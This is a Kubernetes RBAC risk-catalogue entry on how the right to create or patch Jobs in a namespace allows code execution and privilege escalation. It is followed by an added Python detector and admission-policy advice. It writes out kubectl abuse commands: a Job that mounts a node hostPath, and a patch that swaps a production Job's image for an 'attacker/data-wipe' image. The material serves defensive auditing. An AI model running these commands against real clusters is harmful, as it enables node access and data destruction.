Manage Jobs in a namespace (one-off privileged execution)
Elevation of Privilege
High
Overview
| Field | Value |
|---|---|
| ID | 1042 |
| Name | Manage Jobs in a namespace (one-off privileged execution) |
| Risk Category | Elevation of Privilege |
| Risk Level | High |
| Role Type | Role |
| API Groups | batch |
| Resources | jobs |
| Verbs | create, update, patch, delete |
| Tags | PotentialPrivilegeEscalation, Tampering, WorkloadLifecycle |
Description
Permits creating, updating, or deleting Jobs within a specific namespace. Because a Job runs a pod with whatever pod template its creator supplies, this can be used to run a one-off pod, potentially with privileged settings, leading to code execution and potential privilege escalation within that namespace.
Abuse Scenarios
- Create a new Job with a hostPath mount in the namespace.

```bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: batch/v1
kind: Job
metadata:
  name: hostpath-job
spec:
  template:
    spec:
      containers:
      - name: hostpath-container
        image: busybox
        command: ["/bin/sh", "-c", "echo 'Hello from job' >> /host-tmp/job.log"]
        volumeMounts:
        - mountPath: /host-tmp
          name: host-tmp
      volumes:
      - name: host-tmp
        hostPath:
          path: /tmp
      restartPolicy: OnFailure
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
```
- Update an existing Job's image to a malicious one.

```bash
kubectl patch job <job-name> -n <namespace> --type='json' -p='[{"op": "replace", "path": "/spec/template/spec/containers/0/image", "value": "attacker/malicious-script"}]'
# Example: kubectl patch job cleanup-old-data -n production --type='json' -p='[{"op": "replace", "path": "/spec/template/spec/containers/0/image", "value": "attacker/data-wipe"}]'
```
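Both scenarios leave a recognisable shape in the request body an admission webhook or audit-log reviewer sees: a pod template that reaches the node (hostPath, host namespaces, privileged containers) or a JSON patch that swaps a container image. The following is an added example, not part of this entry or any tool it comes from; the function names and the constructed sample manifest and patch are my own.

```python
# Added example: flag Job manifests and JSON patches that match the abuse
# patterns described in this entry. Function names are hypothetical.

HOST_FLAGS = ("hostPID", "hostNetwork", "hostIPC")


def audit_job(job: dict) -> list:
    """Return findings for settings that let a Job's pod reach beyond its namespace."""
    findings = []
    pod = job.get("spec", {}).get("template", {}).get("spec", {})
    # hostPath volumes expose the node filesystem to the pod
    for vol in pod.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"hostPath volume {vol['name']!r} -> {vol['hostPath'].get('path')}")
    # host namespaces (PID/network/IPC) share node resources with the pod
    for flag in HOST_FLAGS:
        if pod.get(flag):
            findings.append(f"{flag} enabled")
    # privileged containers bypass most container isolation
    for c in pod.get("containers", []) + pod.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"container {c['name']!r} runs privileged")
    return findings


def patch_changes_image(ops: list) -> list:
    """Return the paths of JSON-patch ops that replace or add a container image."""
    return [op["path"] for op in ops
            if op.get("op") in ("replace", "add") and op.get("path", "").endswith("/image")]


# Constructed sample: same shape as the hostpath-job manifest in this entry
SAMPLE_JOB = {
    "apiVersion": "batch/v1", "kind": "Job", "metadata": {"name": "hostpath-job"},
    "spec": {"template": {"spec": {
        "containers": [{"name": "hostpath-container", "image": "busybox",
                        "volumeMounts": [{"mountPath": "/host-tmp", "name": "host-tmp"}]}],
        "volumes": [{"name": "host-tmp", "hostPath": {"path": "/tmp"}}],
        "restartPolicy": "OnFailure"}}},
}

# Constructed sample: an image swap patch of the kind shown above (placeholder image)
SAMPLE_PATCH = [{"op": "replace", "path": "/spec/template/spec/containers/0/image",
                 "value": "registry.example/replaced-image"}]

if __name__ == "__main__":
    print(audit_job(SAMPLE_JOB))          # ['hostPath volume \'host-tmp\' -> /tmp']
    print(patch_changes_image(SAMPLE_PATCH))  # ['/spec/template/spec/containers/0/image']
```

A ValidatingAdmissionPolicy or webhook that rejects Jobs with non-empty findings, combined with an audit-log alert on `patch`/`update` of `jobs` whose body matches `patch_changes_image`, covers both scenarios without removing the role itself.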